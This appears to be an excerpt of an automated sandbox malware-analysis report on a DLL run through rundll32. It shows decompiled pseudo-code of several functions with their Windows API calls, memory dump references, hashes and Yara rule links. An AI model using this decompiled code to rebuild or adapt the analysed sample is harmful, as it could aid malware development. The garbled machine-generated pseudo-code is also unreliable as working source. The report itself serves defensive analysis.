				 *((long long*)(_t87 + 0x18)) = _t122;
				 *((long long*)(_t87 + 8)) = __rcx;
				_t126 = _t125 - 0x860;
				r14d =  *((intOrPtr*)(_t126 + 0x8b8));
				_t91 = __rdx;
				 *(_t126 + 0x30) = _t148 << 2;
				memcpy(_t148, _t145, _t143);
				_t9 = _t126 + 0x454; // 0x4a5
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(__rdx, _t9, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
				_t13 = _t126 + 0x658; // 0x6a9
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t13, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
				memset(_t112, _t116);
				 *((intOrPtr*)(_t126 + 0x40)) = 1;
				_t73 = __edi - 1;
				if (_t78 < 0) goto 0x80001faa;
				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
				r12d = _t73;
				if (_t73 < 0) goto 0x80002081;
				_t65 =  *(__r8 + _t73 * 4);
				if (_t73 != r12d) goto 0x80001fe8;
				if ((_t65 & 0xc0000000) != 0) goto 0x80001fe8;
				_t66 = _t65 << 2;
				if ((_t66 & 0xc0000000) == 0) goto 0x80001fd2;
				if (0x10000001e == 0) goto 0x80002075;
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
				_t85 = _t66 >> 0x1e;
				if (_t85 == 0) goto 0x80002068;
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
				if (_t85 != 0) goto 0x80001fef;
				if (_t85 >= 0) goto 0x80001fbb;
				memcpy(??, ??, ??);
				r8d = 0x60c;
				memset(??, ??, ??);
				r8d = 0x204;
				return memset(??, ??, ??);
			}

APIs

memcpy.NTDLL ref: 0000000180001F31

Part of subcall function 0000000180003934: memset.NTDLL ref: 0000000180003985

memset.NTDLL ref: 0000000180001F8A
memcpy.NTDLL ref: 0000000180002093
memset.NTDLL ref: 00000001800020A8
memset.NTDLL ref: 00000001800020BA

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006108 Relevance: 6.4, APIs: 5, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
				long long _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				intOrPtr _t40;
				void* _t56;
				void* _t57;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr* _t73;
				signed long long _t90;
				void* _t92;
				void* _t108;
				void* _t110;
				intOrPtr* _t112;

				_t72 = __rbx;
				_a16 = __rbx;
				_a8 = __rcx;
				_t69 =  *0x8000d4a0;
				_t57 = r8d;
				_v72 =  *((intOrPtr*)(_t69 + 8));
				_t8 = _t90 + 8; // 0x8
				r14d = _t8;
				HeapAlloc(??, ??, ??);
				if (_t69 == 0) goto 0x8000627d;
				if (_t57 == 0) goto 0x800061f7;
				_t112 = __rdx + 0x20;
				E00000001180006008(__rbx, __rcx, _t92, __rdx + (__rbx + __rbx * 4) * 8);
				if (_t69 == 0) goto 0x800061ec;
				r9d =  *((intOrPtr*)(_t112 - 8));
				_v88 = _t69 + (_t90 + _t90 * 2) * 8;
				_a24 = E00000001180006344(_t69, _t72, _a8, _t69, _t92,  *_t112, _t108, _t110);
				HeapFree(??, ??, ??);
				_t40 = _a24;
				if (_t40 == 0) goto 0x800061ec;
				_t56 = 0 + _t40;
				if (1 - _t57 < 0) goto 0x80006176;
				r14d = 8;
				if (1 != _t57) goto 0x80006225;
				_v88 = _a64;
				r14d = E00000001180007444(_t40, _t56, _t72, _t69, _a48, _a56);
				if (_t56 == 0) goto 0x8000626f;
				_t31 =  &_a8; // 0x8
				_t73 = _t31;
				if ( *_t73 == 0) goto 0x8000624b;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t73 - 8)) == 0) goto 0x80006265;
				_t67 =  *((intOrPtr*)(_t73 + 0xc));
				if (_t67 == 0) goto 0x80006265;
				HeapFree(??, ??, ??);
				if (_t67 != 0) goto 0x80006238;
				HeapFree(??, ??, ??);
				return r14d;
			}

APIs

HeapAlloc.KERNEL32 ref: 0000000180006151
HeapFree.KERNEL32 ref: 00000001800061C7
HeapFree.KERNEL32 ref: 0000000180006245
HeapFree.KERNEL32 ref: 000000018000625F
HeapFree.KERNEL32 ref: 0000000180006277

Part of subcall function 0000000180006008: lstrlenA.KERNEL32(?,?,00000000,0000000180006189), ref: 0000000180006042
Part of subcall function 0000000180006008: RtlAllocateHeap.NTDLL ref: 0000000180006057
Part of subcall function 0000000180006008: _snprintf.NTDLL ref: 00000001800060B9
Part of subcall function 0000000180006008: lstrcpyA.KERNEL32 ref: 00000001800060DD

Part of subcall function 0000000180006344: SleepEx.KERNEL32(00000000,00000001800061B8), ref: 000000018000638C
Part of subcall function 0000000180006344: GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180006397
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 00000001800063E6
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 00000001800063F2
Part of subcall function 0000000180006344: HeapAlloc.KERNEL32 ref: 0000000180006405
Part of subcall function 0000000180006344: lstrcpyA.KERNEL32 ref: 000000018000641D
Part of subcall function 0000000180006344: lstrcatA.KERNEL32 ref: 0000000180006444
Part of subcall function 0000000180006344: lstrcatA.KERNEL32 ref: 0000000180006450
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 0000000180006482
Part of subcall function 0000000180006344: HeapAlloc.KERNEL32 ref: 000000018000649B

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Freelstrlen$Alloc$Timelstrcatlstrcpy$AllocateFileSleepSystem_snprintf
String ID:
API String ID: 3514998008-0
Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007DBC Relevance: 6.2, APIs: 4, Instructions: 163
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00000001180007DBC(void* __edx, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
				intOrPtr _v80;
				void* _v88;
				long _v96;
				signed int _v104;
				long long _v112;
				long long _v120;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed int _t55;
				signed int _t63;
				void* _t64;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t75;
				void* _t76;
				void* _t85;
				signed long long _t107;
				struct _FILETIME* _t110;
				void* _t128;
				void* _t129;
				long _t131;
				signed int _t132;
				void* _t135;
				void* _t137;
				void* _t147;
				void* _t148;
				void* _t149;
				signed int* _t150;
				long long _t151;
				void* _t153;
				signed long long _t155;
				void* _t157;

				_t148 = _t137;
				 *((long long*)(_t148 + 0x18)) = __r8;
				 *((long long*)(_t148 + 0x10)) = __rdx;
				 *(_t148 + 0x20) =  *(_t148 + 0x20) & 0x00000000;
				r14d = 0;
				_v104 =  *0x8000d498;
				_t129 = __rcx;
				 *(_t148 - 0x58) =  *(_t148 - 0x58) & _t155;
				if (E00000001180001CB0(_t110, __rcx, _t148 - 0x60, _t135, _t148 + 8, _t157, _t155) == 0) goto 0x80007e19;
				_t11 = _t155 + 1; // 0x1
				r12d = _t11;
				_v96 = _t131;
				goto 0x80007e24;
				_t132 = _v96;
				r12d = 2;
				_t14 =  &_a32; // 0xba
				_t15 =  &_v88; // 0x42
				if (E00000001180008034(_t71, r12d, _t85, _t110, _t129, _t132, _t135, _t15, _t14, _t153, _t149) != 0) goto 0x80007fff;
				r8d = _a32;
				r13d = r8d;
				r13d = r13d - r12d;
				_t150 = _v88;
				if (_t132 == 0) goto 0x80007e7d;
				_t55 = _a8;
				_t150[0xa] = 1;
				_t150[0x12] = _t132;
				_t150[0xd] = _t55;
				_t150[0x10] = _t55;
				_t24 = _t129 + 0xb0; // 0xb0
				r9d = 0;
				 *_t150 = _v104 ^ 0x62ade362;
				_t150[3] =  *(_t129 + 0x48);
				_t150[2] =  *(_t129 + 0x4c);
				_t29 =  &_a8; // 0xa2
				_v112 = _t29;
				_t31 =  &_v104; // 0x32
				_v120 = _t31;
				_t73 = E0000000118000970C(_t54, _t110, _t24, _t150, _t132, _t15, _t14, _t148);
				HeapFree(_t128, _t131, _t135);
				if (r13d == 0) goto 0x80007eef;
				if (_t73 == 0) goto 0x80007ee4;
				if (_t73 != 0x10d2) goto 0x80007eef;
				E000000011800023B8(r13d, _t110, _t129, _t132, _t135);
				if (_t73 != 0) goto 0x80007fff;
				_t74 = _a8;
				_t151 = _v104;
				r13d =  *(_t129 + 0x4c);
				_t63 = E00000001180008C48(_t74, _t151);
				_t36 =  &_a8; // 0xa2
				r9d = 1;
				 *(_t129 + 0x48) = _t74;
				 *(_t129 + 0x4c) = _t63;
				_t64 = E000000011800099F4(_t76, _t110, _t129, _t151, _t132, _t135, _t36, _t147, _t148);
				_t75 = _t64;
				if (_t64 != 0) goto 0x80007fef;
				 *_a16 = _t151;
				 *_a24 = _a8;
				if ( *(_t129 + 0x4c) != r13d) goto 0x80007f62;
				r14d = 1;
				if ( *((intOrPtr*)(_t129 + 0x60)) == 0) goto 0x80007fb5;
				GetSystemTimeAsFileTime(_t110);
				if (r14d == 0) goto 0x80007fa2;
				_t107 =  *((intOrPtr*)(_t129 + 0x58));
				if (_v80 - _t107 <= 0) goto 0x80007fa2;
				_t47 = _t129 + 0xb0; // 0xb0
				if (E000000011800045E8(_t75, _t107, _t110, _t47, _t132, _t135) != 0) goto 0x80007fa2;
				asm("lock or dword [edi+0xdc], 0x1");
				 *((long long*)(_t129 + 0x58)) = _t107 * 0x23c34600 + _v80;
				if (_v96 == 0) goto 0x80007fdc;
				HeapFree(??, ??, ??);
				if (_t75 == 0) goto 0x80007fd4;
				if (_t75 != 0x10d2) goto 0x80007fdc;
				E00000001180008BC4(_t110, _t129, _v96);
				return _t75;
			}

APIs

Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77

HeapFree.KERNEL32 ref: 0000000180007ECD
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
HeapFree.KERNEL32 ref: 0000000180007FC2
HeapFree.KERNEL32 ref: 0000000180007FF7

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
String ID:
API String ID: 2852518528-0
Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005578 Relevance: 6.0, APIs: 4, Instructions: 37sleepmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055AF
Sleep.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055C1
CloseHandle.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055D9
HeapFree.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055E7

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: CloseEventFreeHandleHeapSleep
String ID:
API String ID: 1881548302-0
Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000137C Relevance: 5.2, APIs: 4, Instructions: 233
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0000000118000137C(signed int __esi, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
				void* __rbp;
				intOrPtr _t29;
				void* _t32;
				void* _t38;
				void* _t42;
				void* _t54;
				void* _t55;
				intOrPtr _t56;
				void* _t60;
				void* _t61;
				void* _t65;
				signed int _t73;
				void* _t105;
				void* _t113;
				intOrPtr _t126;
				long long _t130;
				char* _t133;
				intOrPtr* _t140;
				long _t143;
				long _t145;
				void* _t148;
				void* _t150;
				void* _t151;
				intOrPtr* _t155;
				char* _t162;
				void* _t164;
				void* _t171;
				long _t173;
				int _t176;
				void* _t180;
				void* _t182;

				_t164 = __r10;
				_t140 = __rdx;
				_t130 = __rcx;
				 *((long long*)(_t150 + 0x10)) = __rbx;
				 *((long long*)(_t150 + 8)) = __rcx;
				_t151 = _t150 - 0x60;
				_t126 =  *0x8000d4a0;
				r14d = r8d;
				if (r8d == 0) goto 0x8000160a;
				_t73 = __esi | 0xffffffff;
				r11d = 0;
				r10d = 0;
				_t29 =  *__rdx;
				if (_t29 == 0xd) goto 0x80001419;
				if (_t29 == 0xa) goto 0x80001419;
				if (0 != 0) goto 0x800013ef;
				if (_t29 == 0x20) goto 0x800013f1;
				if (_t29 == 9) goto 0x800013f1;
				goto 0x800013f1;
				if (_t29 != 0x3b) goto 0x800013fd;
				if (r11d != 0) goto 0x8000141d;
				r11d = 1;
				if (_t29 != 0x3d) goto 0x80001407;
				if (0 != 0) goto 0x8000141d;
				if (_t29 != 0x7c) goto 0x8000141d;
				if (r10d != 0) goto 0x8000141d;
				if (1 != 0) goto 0x8000141d;
				r10d = 1;
				goto 0x8000141d;
				if (1 != 0) goto 0x80001424;
				if (1 != 0) goto 0x800013ce;
				if (__rdx == _t143) goto 0x8000160a;
				r13d = r13d - r8d;
				r13d = r13d - 1;
				r14d = r14d + r13d;
				r13d = 1;
				if (r11d == 1) goto 0x800015fb;
				if (1 == 0) goto 0x80001459;
				r12d = 1;
				_t5 = _t140 - 1; // -1
				_t54 = _t5;
				goto 0x8000145c;
				_t173 = _t143;
				if (_t54 == 0) goto 0x80001605;
				if (r10d == 0) goto 0x800014db;
				_t6 = _t164 - 1; // -1
				_t60 = _t6;
				if (_t60 == 0) goto 0x800014db;
				_t31 =  <  ? _t60 : 0x10;
				if (0x10 == 0) goto 0x800014ab;
				r9b =  *__rdx;
				if (r9b == dil) goto 0x800014ab;
				if (r9b == 0x20) goto 0x800014ab;
				_t105 = r9b - 9;
				if (_t105 == 0) goto 0x800014ab;
				 *((intOrPtr*)(_t151 + 0x30 - __rdx + __rdx)) = r9b;
				if (_t105 != 0) goto 0x8000148c;
				_t61 = _t60 + 1;
				_t32 = ( <  ? _t60 : 0x10) - 0x10 + _t73;
				 *((intOrPtr*)(_t151 + _t126 + 0x30)) = dil;
				_t162 = _t61 + __rdx;
				if ( *_t162 == 0x20) goto 0x800014c6;
				if ( *_t162 != 9) goto 0x800014cd;
				goto 0x800014ba;
				r9b =  *((intOrPtr*)(_t151 + 0x30));
				_t155 = __rdx + _t126;
				_t55 = _t54 - _t61 + 1;
				goto 0x800014e3;
				r9b = dil;
				 *((intOrPtr*)(_t151 + 0x30)) = dil;
				_t64 =  <  ? _t55 : 0x10;
				r11d = 0x10;
				if (0x10 == 0) goto 0x80001524;
				_t56 =  *_t155;
				if (_t56 == dil) goto 0x80001524;
				if (_t56 == 0x20) goto 0x80001524;
				if (_t56 == 9) goto 0x80001524;
				_t14 = _t130 - 0x61; // -96
				_t113 = _t14 - 0x19;
				if (_t113 > 0) goto 0x80001518;
				 *((char*)(_t151 + 0x48 - _t155 + _t155)) = _t56 + 0xe0;
				r11d = r11d + _t73;
				if (_t113 != 0) goto 0x800014fc;
				_t65 = ( <  ? _t55 : 0x10) - r11d;
				 *((intOrPtr*)(_t151 + __rdx + 0x48)) = dil;
				if (r9b != dil) goto 0x80001546;
				r8d = 0x10;
				memcpy(_t182, _t180, _t176);
				if (_t173 == _t143) goto 0x80001591;
				if (1 <= 0) goto 0x80001568;
				if ( *_t173 == 0x20) goto 0x8000155f;
				if ( *_t173 != 9) goto 0x80001568;
				if (1 - 1 < 0) goto 0x80001551;
				if (1 == 1) goto 0x80001593;
				_t38 = _t148 - 1;
				if (_t38 <= 0) goto 0x8000158c;
				_t133 = _t38 + _t173 + 1;
				if ( *_t133 == 0x20) goto 0x80001583;
				if ( *_t133 != 9) goto 0x8000158c;
				if (_t38 + _t73 > 0) goto 0x80001579;
				goto 0x80001593;
				_t22 = _t148 + 1; // 0x1
				r8d = _t22;
				HeapAlloc(_t171, _t143, _t145);
				if (_t126 == _t143) goto 0x800015f8;
				r8d = 0;
				memcpy(_t148, ??);
				 *((intOrPtr*)(__rbx + _t126)) = dil;
				_t42 = E00000001180008C48(0xffffffff, _t151 + 0x48);
				r9d = 0;
				 *((long long*)(_t151 + 0x20)) = _t151 + 0x30;
				E00000001180005748(_t56 + 0xe0, _t42, __rbx,  *((intOrPtr*)(_t151 + 0xa0)), _t173 + 1, _t126);
				HeapFree(??, ??, ??);
				if (r14d == 0) goto 0x8000160a;
				goto 0x800013bb;
				return 0xb;
			}

APIs

memcpy.NTDLL ref: 0000000180001541
HeapAlloc.KERNEL32 ref: 000000018000159C
memcpy.NTDLL ref: 00000001800015B5
HeapFree.KERNEL32 ref: 00000001800015F2

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heapmemcpy$AllocFree
String ID:
API String ID: 1496448200-0
Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001208 Relevance: 5.1, APIs: 4, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00000001180001208(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
				char _v48;
				long long _v56;
				long long _t43;
				long long _t57;
				long long _t58;
				void* _t68;
				long long* _t73;
				void* _t75;

				_t56 = __rdx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t43 =  *0x8000d4a0;
				r12d = r8d;
				_t75 = __rdx;
				if (__rdx == _t57) goto 0x80001304;
				if (r8d == 0) goto 0x80001304;
				EnterCriticalSection(??);
				asm("lock add dword [esi+0x40], 0x1");
				LeaveCriticalSection(??);
				_t7 =  &_a8; // -110
				r8d = 0;
				_v48 = 0;
				_a8 = 0;
				_v56 = _t57;
				if (E00000001180009994(r12d, __rdx, __rdx, _t68, _t7) != 0x7a) goto 0x800012fd;
				r8d = _a8;
				HeapAlloc(??, ??, ??);
				_t58 = _t43;
				if (_t43 == 0) goto 0x800012f8;
				_v48 = 0x10;
				_t14 =  &_a8; // -110
				_t73 = _t14;
				_v56 = __rcx + 0x72;
				if (E00000001180009994(r12d, _t75, _t56, _t43, _t73) != 0) goto 0x800012e8;
				 *__r9 = _t58;
				 *_a40 = _a8;
				goto 0x800012fd;
				HeapFree(??, ??, ??);
				goto 0x800012fd;
				asm("lock add dword [esi+0x40], 0xffffffff");
				goto 0x80001313;
				 *_t73 = _t58;
				 *_a40 = 0;
				return 0;
			}

APIs

EnterCriticalSection.KERNEL32(?,000000018000134F), ref: 0000000180001256
LeaveCriticalSection.KERNEL32 ref: 0000000180001265
HeapAlloc.KERNEL32 ref: 000000018000129C
HeapFree.KERNEL32 ref: 00000001800012F0

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterFreeLeave
String ID:
API String ID: 2939682908-0
Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800081F0 Relevance: 5.1, APIs: 4, Instructions: 78
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E000000011800081F0(void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
				signed int _t21;
				signed int _t28;
				signed int* _t38;
				int _t53;
				long long _t58;
				void* _t61;
				void* _t72;
				signed int* _t73;
				long _t75;
				long _t78;
				void* _t81;

				 *((long long*)(_t61 + 8)) = __rbx;
				 *((long long*)(_t61 + 0x10)) = _t58;
				 *((long long*)(_t61 + 0x18)) = __rsi;
				_t21 =  *__rcx & 0x0000ffff;
				_t38 = __rbx + 4;
				r11d = __edx;
				r10d = 0x57;
				if (__r11 - _t38 <= 0) goto 0x800082e1;
				_t28 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
				if (_t21 == 0) goto 0x800082e1;
				if (_t21 - 0x200 > 0) goto 0x800082e1;
				if (_t28 == 0) goto 0x800082e1;
				if (_t28 - 0x200 > 0) goto 0x800082e1;
				r15d = 0x404;
				HeapAlloc(_t81, _t78, _t75);
				_t73 = _t38;
				if (_t38 == 0) goto 0x800082db;
				memset(_t72, _t53);
				 *_t73 = (_t21 & 0x0000fff0) << 3;
				memcpy(??, ??, ??);
				memcpy(??, ??, ??);
				 *__r8 = _t73;
				 *__r9 = r15d;
				r10d = 0;
				goto 0x800082e1;
				r10d = 8;
				return r10d;
			}

APIs

HeapAlloc.KERNEL32 ref: 0000000180008278
memset.NTDLL ref: 000000018000828E
memcpy.NTDLL ref: 00000001800082B4
memcpy.NTDLL ref: 00000001800082CA

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: memcpy$AllocHeapmemset
String ID:
API String ID: 609429373-0
Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800030C8 Relevance: 5.1, APIs: 4, Instructions: 77memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,0000000180008793), ref: 000000018000310D
HeapAlloc.KERNEL32(?,?,?,0000000180008793), ref: 0000000180003126
memcpy.NTDLL ref: 000000018000314B
memcpy.NTDLL ref: 000000018000317D

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: memcpy$AllocHeaplstrlen
String ID:
API String ID: 2888080719-0
Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008C60 Relevance: 5.1, APIs: 4, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
